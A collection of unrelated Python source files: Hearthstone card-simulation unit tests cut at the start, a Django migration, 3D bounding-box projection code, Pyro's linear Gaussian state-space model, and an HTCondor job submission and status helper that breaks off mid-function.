self.assertEqual(17, game.other_player.hero.health)
def test_Polymorph(self):
game = generate_game_for(MogushanWarden, Polymorph, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertTrue(game.current_player.minions[0].taunt)
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual("Mogu'shan Warden", game.current_player.minions[0].card.name)
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertFalse(game.other_player.minions[0].taunt)
self.assertEqual(1, game.other_player.minions[0].calculate_attack())
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual("Sheep", game.other_player.minions[0].card.name)
self.assertEqual(MINION_TYPE.BEAST, game.other_player.minions[0].card.minion_type)
def test_Blizzard(self):
game = generate_game_for(Blizzard, MogushanWarden, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 10):
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual(7, game.current_player.minions[1].health)
self.assertFalse(game.current_player.minions[0].frozen)
self.assertFalse(game.current_player.minions[1].frozen)
game.play_single_turn()
self.assertEqual(2, len(game.other_player.minions))
self.assertEqual(5, game.other_player.minions[0].health)
self.assertEqual(5, game.other_player.minions[1].health)
self.assertTrue(game.other_player.minions[0].frozen)
self.assertTrue(game.other_player.minions[1].frozen)
def test_Flamestrike(self):
game = generate_game_for(Flamestrike, MogushanWarden, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(3, len(game.current_player.minions))
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual(7, game.current_player.minions[1].health)
self.assertEqual(7, game.current_player.minions[2].health)
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(3, game.other_player.minions[0].health)
self.assertEqual(3, game.other_player.minions[1].health)
self.assertEqual(3, game.other_player.minions[2].health)
def test_Pyroblast(self):
game = generate_game_for(Pyroblast, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 18):
game.play_single_turn()
self.assertEqual(30, game.current_player.hero.health)
game.play_single_turn()
self.assertEqual(20, game.other_player.hero.health)
def test_ArchmageAntonidas(self):
game = generate_game_for([ArchmageAntonidas, Vaporize], StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 12):
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Archmage Antonidas", game.current_player.minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual("Fireball", game.current_player.hand[9].name)
def test_Duplicate(self):
game = generate_game_for([BloodfenRaptor, Duplicate], ShadowBolt, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(6, len(game.other_player.hand))
self.assertEqual("Bloodfen Raptor", game.other_player.hand[4].name)
self.assertEqual("Bloodfen Raptor", game.other_player.hand[5].name)
self.assertEqual(0, len(game.other_player.secrets))
def test_Duplicate_and_play_after(self):
game = generate_game_for([Wisp, Wisp, Wisp, Wisp, Wisp, Duplicate], LightningStorm,
CardTestingAgent, OneCardPlayingAgent)
for turn in range(5):
game.play_single_turn()
self.assertEqual(0, len(game.current_player.hand))
self.assertEqual(5, len(game.current_player.minions))
self.assertEqual(1, len(game.current_player.secrets))
game.play_single_turn()
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(2, len(game.other_player.hand))
game.play_single_turn()
self.assertEqual(0, len(game.current_player.hand))
self.assertEqual(3, len(game.current_player.minions))
def test_Duplicate_MadScientist(self):
game = generate_game_for(Hellfire, [MadScientist, MagmaRager, Duplicate],
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(0, len(game.current_player.secrets))
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual("Magma Rager", game.other_player.hand[-1].name)
self.assertEqual("Magma Rager", game.other_player.hand[-2].name)
def test_Snowchugger(self):
game = generate_game_for(Snowchugger, StonetuskBoar, PredictableAgent, DoNothingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(27, game.other_player.hero.health)
self.assertFalse(game.other_player.hero.frozen)
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(2, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual("Snowchugger", game.current_player.minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(25, game.other_player.hero.health)
        # The enemy hero was frozen by this turn's attack; freeze only wears
        # off at the end of the frozen player's own turn
self.assertTrue(game.other_player.hero.frozen)
# Now make sure that attacking the Snowchugger directly will freeze a character
random.seed(1857)
game = generate_game_for(Snowchugger, IronbarkProtector, OneCardPlayingAgent, PredictableAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(2, game.other_player.minions[0].health)
# The player should be frozen because of weapon attack
self.assertEqual(29, game.current_player.hero.health)
self.assertTrue(game.current_player.hero.frozen)
game.play_single_turn()
game.play_single_turn()
# The player should still be frozen from last turn, and thus shouldn't have attacked
self.assertEqual(29, game.current_player.hero.health)
        # If Snowchugger has 0 attack and is attacked, the attacker will NOT be frozen since no damage was dealt
game = generate_game_for(Snowchugger, StonetuskBoar, PredictableAgent, PredictableAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual("Snowchugger", game.players[1].minions[0].card.name)
# Cheat
game.players[1].minions[0].base_attack = 0
self.assertEqual(0, game.players[1].minions[0].calculate_attack())
self.assertEqual(3, game.players[1].minions[0].health)
        # Stonetusk should have attacked the Snowchugger, and will NOT be frozen since it took no damage in return
game.play_single_turn()
self.assertEqual(1, game.players[1].minions[0].health)
self.assertFalse(game.players[0].minions[0].frozen)
def test_GoblinBlastmage(self):
game = generate_game_for([GoblinBlastmage, ClockworkGnome, GoblinBlastmage], [Mechwarper, ClockworkGnome],
CardTestingAgent, CardTestingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(7, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(1, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[2].health)
self.assertEqual(1, game.current_player.minions[3].health)
self.assertEqual(3, game.current_player.minions[4].health)
self.assertEqual(1, game.current_player.minions[5].health)
self.assertEqual(3, game.current_player.minions[6].health)
# Blastmage should not go off, as there is no friendly mech down
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(7, len(game.other_player.minions))
self.assertEqual(3, game.other_player.minions[0].health)
self.assertEqual(1, game.other_player.minions[1].health)
self.assertEqual(3, game.other_player.minions[2].health)
self.assertEqual(1, game.other_player.minions[3].health)
self.assertEqual(3, game.other_player.minions[4].health)
self.assertEqual(1, game.other_player.minions[5].health)
self.assertEqual(3, game.other_player.minions[6].health)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
# The Blastmage hits the warper at index 2 twice, and the two gnomes at indices 1 and 3.
self.assertEqual(3, len(game.current_player.minions))
self.assertEqual(5, len(game.other_player.minions))
self.assertEqual(3, game.other_player.minions[0].health)
self.assertEqual(1, game.other_player.minions[1].health)
self.assertEqual(1, game.other_player.minions[2].health)
self.assertEqual(3, game.other_player.minions[3].health)
self.assertEqual(3, game.other_player.minions[4].health)
self.assertEqual(30, game.other_player.hero.health)
def test_Flamecannon(self):
game = generate_game_for(Flamecannon, SenjinShieldmasta, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
# Flamecannon hasn't been played since there hasn't been an enemy minion until now.
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(5, game.players[1].minions[0].health)
        # An enemy minion exists, so Flamecannon will be played.
game.play_single_turn()
self.assertEqual(7, len(game.players[0].hand))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(1, game.players[1].minions[0].health)
def test_WeeSpellstopper(self):
game = generate_game_for(WeeSpellstopper, ShadowBolt, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
# First Spellstopper gets Bolted but lives with 1 hp
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
# Once there are 2 Spellstoppers, they are both spell immune
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].health)
self.assertEqual(1, game.players[0].minions[1].health)
game.play_single_turn()
game.players[0].minions[0].die(None)
game.players[0].minions[1].die(None)
game.check_delayed()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
# Last Spellstopper is not immune and dies to Shadow Bolt
game.play_single_turn()
self.assertEqual(0, len(game.players[0].minions))
def test_WeeSpellstopperSilence(self):
game = generate_game_for(WeeSpellstopper, [Silence, ShadowBolt], OneCardPlayingAgent,
OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
# First Spellstopper gets silenced
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(5, game.players[0].minions[0].health)
        # Once there are 2 Spellstoppers, only the first receives the aura
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual(5, game.players[0].minions[1].health)
def test_FlameLeviathan(self):
game = generate_game_for(Wisp, FlameLeviathan, CardTestingAgent, CardTestingAgent)
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(30, game.current_player.hero.health)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(28, game.current_player.hero.health)
self.assertEqual(28, game.other_player.hero.health)
def test_EchoOfMedivh(self):
game = generate_game_for([NoviceEngineer, NoviceEngineer, GnomishInventor, GnomishInventor, EchoOfMedivh], Wisp,
OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 10):
game.play_single_turn()
# Plays first 4 "draw" minions
self.assertEqual(8, len(game.players[0].hand))
self.assertEqual(4, len(game.players[0].minions))
game.play_single_turn()
# Plays Echo and overflows
self.assertEqual(10, len(game.players[0].hand))
self.assertEqual(4, len(game.players[0].minions))
self.assertEqual("Novice Engineer", game.players[0].hand[8].name)
self.assertEqual("Novice Engineer", game.players[0].hand[9].name)
def test_UnstablePortal(self):
game = generate_game_for(UnstablePortal, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(3):
game.play_single_turn()
self.assertEqual(5, len(game.current_player.hand))
self.assertTrue(game.current_player.hand[-1].is_minion())
if game.current_player.hand[-1].mana >= 3:
                # TODO: this assertion may fail if Unstable Portal summons a Giant,
                # whose cost depends on game state; no good way to handle that yet
self.assertEqual(3, game.current_player.hand[-1].mana - game.current_player.hand[-1].mana_cost())
def test_DragonsBreath(self):
game = generate_game_for([Flamestrike, DragonsBreath], StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(13):
game.play_single_turn()
# The flamestrike kills 6 boars, so the Dragon's Breath is free
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(26, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
# The Flamestrike only kills one boar, so we can't afford the Dragon's breath
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(26, game.other_player.hero.health)
def test_Flamewaker(self):
game = generate_game_for([Flamewaker, CircleOfHealing], CircleOfHealing,
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(6):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(30, game.players[1].hero.health)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(30, game.players[0].hero.health)
self.assertEqual(28, game.players[1].hero.health)
|
from abc import ABC, abstractmethod
class StartableBase(ABC):
"""Abstract base class for Thread- and Process-like objects."""
__slots__ = ()
@abstractmethod
def start(self) -> None:
raise NotImplementedError
__all__ = ["StartableBase"]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-29 23:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('judge', '0007_auto_20160228_1453'),
]
operations = [
migrations.RemoveField(
model_name='problem',
name='judged_by',
),
migrations.AddField(
model_name='submission',
name='detail_message',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='submission',
name='status',
field=models.CharField(choices=[('SU', 'Submitting'), ('SE', 'Submission Error'), ('CO', 'Compiling'), ('CE', 'Compilation Error'), ('JU', 'Judging'), ('AC', 'Accepted'), ('PA', 'Partially Accepted'), ('TL', 'Time Limit Exceeded'), ('ML', 'Memory Limit Exceeded'), ('RE', 'Runtime Error')], default='SU', max_length=2),
),
]
|
"""3D geometric functions used by the visualizer."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Dict, List, Tuple, Union
import numpy as np
from ..label.typing import Box3D
def rotate_vector(
vector: np.ndarray,
rot_x: float = 0,
rot_y: float = 0,
rot_z: float = 0,
center: Union[np.ndarray, None] = None,
) -> np.ndarray:
"""Rotate a vector given axis-angles."""
if center is not None:
vector -= center
x0, y0, z0 = vector.tolist()
cos_ry, sin_ry = [np.cos(rot_y), np.sin(rot_y)]
x1, y1, z1 = [sin_ry * z0 + cos_ry * x0, y0, cos_ry * z0 - sin_ry * x0]
cos_rz, sin_rz = [np.cos(rot_z), np.sin(rot_z)]
x2, y2, z2 = [cos_rz * x1 - sin_rz * y1, sin_rz * x1 + cos_rz * y1, z1]
cos_rx, sin_rx = [np.cos(rot_x), np.sin(rot_x)]
x3, y3, z3 = [x2, cos_rx * y2 - sin_rx * z2, sin_rx * y2 + cos_rx * z2]
vector = np.array([x3, y3, z3])
if center is not None:
vector += center
return vector
def vector_3d_to_2d(
vector: np.ndarray, calibration: np.ndarray
) -> List[float]:
"""Project 3d vector to the 2d camera view."""
    # Homogeneous coordinates, so a 3x4 calibration matrix can be applied.
    vec_3d = np.ones(4)
    vec_3d[:3] = vector
vec_2d = np.dot(calibration, vec_3d)
return [vec_2d[0] / vec_2d[2], vec_2d[1] / vec_2d[2]]
def check_side_of_line(
point: np.ndarray, line: Tuple[np.ndarray, np.ndarray]
) -> int:
"""Chece which side does a point locate."""
p1, p2 = line
det = (point[0] - p1[0]) * (p2[1] - p1[1]) - (point[1] - p1[1]) * (
p2[0] - p1[0]
)
return int(np.sign(det))
def check_clockwise(points: List[np.ndarray]) -> int:
"""Check whether the 4 points in a clockwise order."""
p1, p2, p3, p4 = points
s1 = check_side_of_line(p3, (p1, p2))
s2 = check_side_of_line(p4, (p2, p3))
s3 = check_side_of_line(p1, (p3, p4))
s4 = check_side_of_line(p2, (p4, p1))
if s1 == s2 == s3 == s4:
return int(s1)
return 0
@dataclass
class Vertex:
"""Calss for 3D vertex."""
v3d: List[float]
v2d: List[float]
def __init__(self, vector: np.ndarray, calibration: np.ndarray) -> None:
"""Init the vector."""
self.v3d = vector.tolist()
self.v2d = vector_3d_to_2d(vector, calibration)
class Label3d:
"""Generate the 2D edges of a 3D bounding box."""
def __init__(self, vertices: List[np.ndarray]) -> None:
"""Init the vector."""
self.vertices = vertices
@classmethod
def from_box3d(cls, box3d: Box3D) -> Label3d:
"""Get 8 vertex points of a 3D bounding box."""
x, y, z = box3d.location
center = np.array([x, y, z])
height, width, depth = np.array(box3d.dimension)
def rotate(vector: np.ndarray) -> np.ndarray:
if len(box3d.orientation) == 3:
rot_x, rot_y, rot_z = box3d.orientation
rotated = rotate_vector(vector, rot_x, rot_y, rot_z, center)
else:
rot_y = box3d.orientation[1]
rotated = rotate_vector(
vector, 0, rot_y + np.pi / 2, 0, center
)
return rotated
v000 = rotate(center + np.array([-width / 2, -height / 2, -depth / 2]))
v001 = rotate(center + np.array([-width / 2, -height / 2, depth / 2]))
v010 = rotate(center + np.array([-width / 2, height / 2, -depth / 2]))
v011 = rotate(center + np.array([-width / 2, height / 2, depth / 2]))
v100 = rotate(center + np.array([width / 2, -height / 2, -depth / 2]))
v101 = rotate(center + np.array([width / 2, -height / 2, depth / 2]))
v110 = rotate(center + np.array([width / 2, height / 2, -depth / 2]))
v111 = rotate(center + np.array([width / 2, height / 2, depth / 2]))
return cls([v000, v001, v010, v011, v100, v101, v110, v111])
def get_edges_with_visibility(
self, calibration: np.ndarray
) -> Dict[str, List[List[List[float]]]]:
"""Get edges with visibility."""
vertices = [Vertex(v, calibration) for v in self.vertices]
v000, v001, v010, v011, v100, v101, v110, v111 = vertices
edges = {
"FU": [v000, v100],
"FR": [v100, v110],
"FD": [v010, v110],
"FL": [v000, v010],
"MUL": [v000, v001],
"MUR": [v100, v101],
"MDR": [v110, v111],
"MDL": [v010, v011],
"BU": [v001, v101],
"BR": [v101, v111],
"BD": [v011, v111],
"BL": [v001, v011],
}
faces: Dict[str, Dict[str, Union[List[str], List[Vertex]]]] = {
"F": {
"v": [v000, v100, v110, v010],
"e": ["FU", "FR", "FD", "FL"],
},
"B": {
"v": [v101, v001, v011, v111],
"e": ["BU", "BR", "BD", "BL"],
},
"L": {
"v": [v001, v000, v010, v011],
"e": ["FL", "MUL", "BL", "MDL"],
},
"R": {
"v": [v100, v101, v111, v110],
"e": ["FR", "MUR", "BR", "MDR"],
},
"U": {
"v": [v001, v101, v100, v000],
"e": ["FU", "MUR", "BU", "MUL"],
},
"D": {
"v": [v010, v110, v111, v011],
"e": ["FD", "MDR", "BD", "MDL"],
},
}
face_pairs = ["FB", "LR", "UD"]
dashed_edges = {
"FU": True,
"FR": True,
"FD": True,
"FL": True,
"MUL": True,
"MUR": True,
"MDR": True,
"MDL": True,
"BU": True,
"BR": True,
"BD": True,
"BL": True,
}
for pair in face_pairs:
face1: str = pair[0]
face2: str = pair[1]
cw1 = check_clockwise(
[
np.array(v.v2d)
for v in faces[face1]["v"]
if isinstance(v, Vertex)
]
)
cw2 = check_clockwise(
[
np.array(v.v2d)
for v in faces[face2]["v"]
if isinstance(v, Vertex)
]
)
if cw1 != cw2:
vertices1 = np.array(
[v.v3d for v in faces[face1]["v"] if isinstance(v, Vertex)]
)
vertices2 = np.array(
[v.v3d for v in faces[face2]["v"] if isinstance(v, Vertex)]
)
dist1 = np.linalg.norm(np.median(vertices1, axis=0))
dist2 = np.linalg.norm(np.median(vertices2, axis=0))
solid_face = face1 if dist1 < dist2 else face2
for edge in faces[solid_face]["e"]:
assert isinstance(edge, str)
dashed_edges[edge] = False
edges_with_visibility: Dict[str, List[List[List[float]]]] = {
"dashed": [],
"solid": [],
}
for edge in edges:
if dashed_edges[edge]:
edges_with_visibility["dashed"].append(
[v.v2d for v in edges[edge]]
)
else:
edges_with_visibility["solid"].append(
[v.v2d for v in edges[edge]]
)
return edges_with_visibility
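# --- Illustrative sketch (not part of the module) ---
# rotate_vector applies rotations in y, z, x order about an optional center.
# Rotating the x unit vector by 90 degrees about the z axis yields (up to
# floating point error) the y unit vector.
if __name__ == "__main__":
    v = rotate_vector(np.array([1.0, 0.0, 0.0]), rot_z=np.pi / 2)
    print(np.round(v, 6))  # [0. 1. 0.]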
|
# Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
import torch
import torch.nn as nn
from torch.distributions import MultivariateNormal, constraints
import pyro.distributions as dist
from pyro.contrib.timeseries.base import TimeSeriesModel
from pyro.nn import PyroParam, pyro_method
from pyro.ops.tensor_utils import repeated_matmul
class GenericLGSSM(TimeSeriesModel):
"""
A generic Linear Gaussian State Space Model parameterized with arbitrary time invariant
transition and observation dynamics. The targets are (implicitly) assumed to be evenly
spaced in time. Training and inference are logarithmic in the length of the time series T.
:param int obs_dim: The dimension of the targets at each time step.
:param int state_dim: The dimension of latent state at each time step.
    :param torch.Tensor obs_noise_scale_init: optional initial values for the observation noise scale,
        given as a tensor of shape ``(obs_dim,)``; defaults to ``0.2 * torch.ones(obs_dim)``.
    :param bool learnable_observation_loc: whether the mean of the observation model should be learned or not;
        defaults to False.
    """
def __init__(
self,
obs_dim=1,
state_dim=2,
obs_noise_scale_init=None,
learnable_observation_loc=False,
):
self.obs_dim = obs_dim
self.state_dim = state_dim
if obs_noise_scale_init is None:
obs_noise_scale_init = 0.2 * torch.ones(obs_dim)
assert obs_noise_scale_init.shape == (obs_dim,)
super().__init__()
self.obs_noise_scale = PyroParam(
obs_noise_scale_init, constraint=constraints.positive
)
self.trans_noise_scale_sq = PyroParam(
torch.ones(state_dim), constraint=constraints.positive
)
self.trans_matrix = nn.Parameter(
torch.eye(state_dim) + 0.03 * torch.randn(state_dim, state_dim)
)
self.obs_matrix = nn.Parameter(0.3 * torch.randn(state_dim, obs_dim))
self.init_noise_scale_sq = PyroParam(
torch.ones(state_dim), constraint=constraints.positive
)
if learnable_observation_loc:
self.obs_loc = nn.Parameter(torch.zeros(obs_dim))
else:
self.register_buffer("obs_loc", torch.zeros(obs_dim))
def _get_init_dist(self):
loc = self.obs_matrix.new_zeros(self.state_dim)
return MultivariateNormal(loc, self.init_noise_scale_sq.diag_embed())
def _get_obs_dist(self):
return dist.Normal(self.obs_loc, self.obs_noise_scale).to_event(1)
def _get_trans_dist(self):
loc = self.obs_matrix.new_zeros(self.state_dim)
return MultivariateNormal(loc, self.trans_noise_scale_sq.diag_embed())
def get_dist(self, duration=None):
"""
Get the :class:`~pyro.distributions.GaussianHMM` distribution that corresponds to :class:`GenericLGSSM`.
:param int duration: Optional size of the time axis ``event_shape[0]``.
This is required when sampling from homogeneous HMMs whose parameters
are not expanded along the time axis.
"""
return dist.GaussianHMM(
self._get_init_dist(),
self.trans_matrix,
self._get_trans_dist(),
self.obs_matrix,
self._get_obs_dist(),
duration=duration,
)
@pyro_method
def log_prob(self, targets):
"""
:param torch.Tensor targets: A 2-dimensional tensor of real-valued targets
of shape ``(T, obs_dim)``, where ``T`` is the length of the time series and ``obs_dim``
is the dimension of the real-valued ``targets`` at each time step
:returns torch.Tensor: A (scalar) log probability.
"""
assert targets.dim() == 2 and targets.size(-1) == self.obs_dim
return self.get_dist().log_prob(targets)
@torch.no_grad()
def _filter(self, targets):
"""
Return the filtering state for the associated state space model.
"""
assert targets.dim() == 2 and targets.size(-1) == self.obs_dim
return self.get_dist().filter(targets)
@torch.no_grad()
def _forecast(self, N_timesteps, filtering_state, include_observation_noise=True):
"""
Internal helper for forecasting.
"""
N_trans_matrix = repeated_matmul(self.trans_matrix, N_timesteps)
N_trans_obs = torch.matmul(N_trans_matrix, self.obs_matrix)
predicted_mean = torch.matmul(filtering_state.loc, N_trans_obs)
# first compute the contribution from filtering_state.covariance_matrix
predicted_covar1 = torch.matmul(
N_trans_obs.transpose(-1, -2),
torch.matmul(filtering_state.covariance_matrix, N_trans_obs),
) # N O O
# next compute the contribution from process noise that is injected at each timestep.
# (we need to do a cumulative sum to integrate across time)
process_covar = self._get_trans_dist().covariance_matrix
N_trans_obs_shift = torch.cat([self.obs_matrix.unsqueeze(0), N_trans_obs[:-1]])
predicted_covar2 = torch.matmul(
N_trans_obs_shift.transpose(-1, -2),
torch.matmul(process_covar, N_trans_obs_shift),
) # N O O
predicted_covar = predicted_covar1 + torch.cumsum(predicted_covar2, dim=0)
if include_observation_noise:
predicted_covar = (
predicted_covar + self.obs_noise_scale.pow(2.0).diag_embed()
)
return predicted_mean, predicted_covar
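    # Forecast covariance sketch: with transition matrix A, observation matrix O,
    # process noise covariance Q, filtering covariance S and observation noise
    # covariance R, the h-step-ahead predictive covariance assembled above is
    #   covar(h) = (A^h O)^T S (A^h O) + sum_{k=0}^{h-1} (A^k O)^T Q (A^k O) + R
    # where the sum is realized by the cumulative sum over predicted_covar2 and
    # R is added only when include_observation_noise=True.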
@pyro_method
def forecast(self, targets, N_timesteps):
"""
:param torch.Tensor targets: A 2-dimensional tensor of real-valued targets
of shape ``(T, obs_dim)``, where ``T`` is the length of the time series and ``obs_dim``
is the dimension of the real-valued targets at each time step. These
represent the training data that are conditioned on for the purpose of making
forecasts.
:param int N_timesteps: The number of timesteps to forecast into the future from
the final target ``targets[-1]``.
:returns torch.distributions.MultivariateNormal: Returns a predictive MultivariateNormal distribution
with batch shape ``(N_timesteps,)`` and event shape ``(obs_dim,)``
"""
filtering_state = self._filter(targets)
predicted_mean, predicted_covar = self._forecast(N_timesteps, filtering_state)
return torch.distributions.MultivariateNormal(predicted_mean, predicted_covar)
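
# Minimal usage sketch (synthetic data; shapes follow the docstrings above):
if __name__ == "__main__":
    model = GenericLGSSM(obs_dim=1, state_dim=2)
    targets = torch.randn(100, 1)      # T=100 evenly spaced scalar observations
    loss = -model.log_prob(targets)    # scalar negative log-likelihood
    loss.backward()                    # all dynamics parameters are learnable
    pred = model.forecast(targets, N_timesteps=5)
    print(pred.mean.shape)             # torch.Size([5, 1])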
|
import htcondor
import os
import shutil
import subprocess
import sys
from datetime import datetime, timedelta
from pathlib import Path
from .conf import *
from .dagman import DAGMan
# Must be consistent with job status definitions in src/condor_includes/proc.h
JobStatus = [
"NONE",
"IDLE",
"RUNNING",
"REMOVED",
"COMPLETED",
"HELD",
"TRANSFERRING_OUTPUT",
"SUSPENDED",
"JOB_STATUS_MAX"
]
schedd = htcondor.Schedd()
class Job:
"""
A :class:`Job` holds all operations related to HTCondor jobs
"""
@staticmethod
def submit(file, options=None):
# Make sure the specified submit file exists and is readable!
        if not os.access(file, os.R_OK):
print(f"Error: could not read file {file}")
sys.exit(1)
# If no resource specified, submit job to the local schedd
if "resource" not in options:
with open(file, "r") as submit_file:
submit_data = submit_file.read()
submit_description = htcondor.Submit(submit_data)
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: {error}")
sys.exit(1)
elif options["resource"] == "slurm":
if "runtime" not in options:
print("Error: Slurm resources must specify a --runtime argument")
sys.exit(1)
            # Verify that we have Slurm access; if not, run bosco_cluster to create it
try:
subprocess.check_output(["bosco_cluster", "--status", "hpclogin1.chtc.wisc.edu"])
except Exception:
print(f"You need to install support software to access the Slurm cluster. Please run the following command in your terminal:\n\nbosco_cluster --add hpclogin1.chtc.wisc.edu slurm\n")
sys.exit(1)
Path(TMP_DIR).mkdir(parents=True, exist_ok=True)
DAGMan.write_slurm_dag(file, options["runtime"], options["email"])
os.chdir(TMP_DIR) # DAG must be submitted from TMP_DIR
submit_description = htcondor.Submit.from_dag(str(TMP_DIR / "slurm_submit.dag"))
submit_description["+ResourceType"] = "\"Slurm\""
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time. See the job-set syntax for submitting multiple jobs.")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: f{error}")
sys.exit(1)
elif options["resource"] == "ec2":
if "runtime" not in options:
print("Error: EC2 resources must specify a --runtime argument")
sys.exit(1)
Path(TMP_DIR).mkdir(parents=True, exist_ok=True)
DAGMan.write_ec2_dag(file, options["runtime"], options["email"])
os.chdir(TMP_DIR) # DAG must be submitted from TMP_DIR
submit_description = htcondor.Submit.from_dag("ec2_submit.dag")
submit_description["+ResourceType"] = "\"EC2\""
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time. See the job-set syntax for submitting multiple jobs.")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: f{error}")
sys.exit(1)
@staticmethod
def status(id, options=None):
"""
Displays the status of a job
"""
job = None
job_status = "IDLE"
resource_type = "htcondor"
try:
job = schedd.query(
constraint=f"ClusterId == {id}",
projection=["JobStartDate", "JobStatus", "LastVacateTime", "ResourceType"]
)
except IndexError:
print(f"No job found for ID {id}.")
sys.exit(0)
except Exception as err:
print(f"Error looking up job status: {err}")
sys.exit(1)
if len(job) == 0:
print(f"No job found for ID {id}.")
sys.exit(0)
if "ResourceType" in job[0]:
resource_type = job[0]["ResourceType"].lower()
# Now, produce job status based on the resource type
if resource_type == "htcondor":
            if JobStatus[job[0]['JobStatus']] == "RUNNING":
                job_running_time = datetime.now() - datetime.fromtimestamp(job[0]["JobStartDate"])
                print(f"Job has been running for {job_running_time.seconds//3600}h{(job_running_time.seconds%3600)//60}m{job_running_time.seconds%60}s")
            elif JobStatus[job[0]['JobStatus']] == "HELD":
                job_held_time = datetime.now() - datetime.fromtimestamp(job[0]["LastVacateTime"])
                print(f"Job has been held for {job_held_time.seconds//3600}h{(job_held_time.seconds%3600)//60}m{job_held_time.seconds%60}s")
elif JobStatus[job[0]['JobStatus']] == "COMPLETED":
print("Job has completed")
else:
print(f"Job is {JobStatus[job[0]['JobStatus']]}")
# Jobs running on provisioned Slurm or EC2 resources need to retrieve
# additional information from the provisioning DAGMan log
elif resource_type == "slurm" or resource_type == "ec2":
# Variables specific to jobs running on Slurm clusters
jobs_running = 0
job_started_time = None
provisioner_cluster_id = None
provisioner_job_submitted_time = None
slurm_cluster_id = None
slurm_nodes_requested = None
slurm_runtime = None
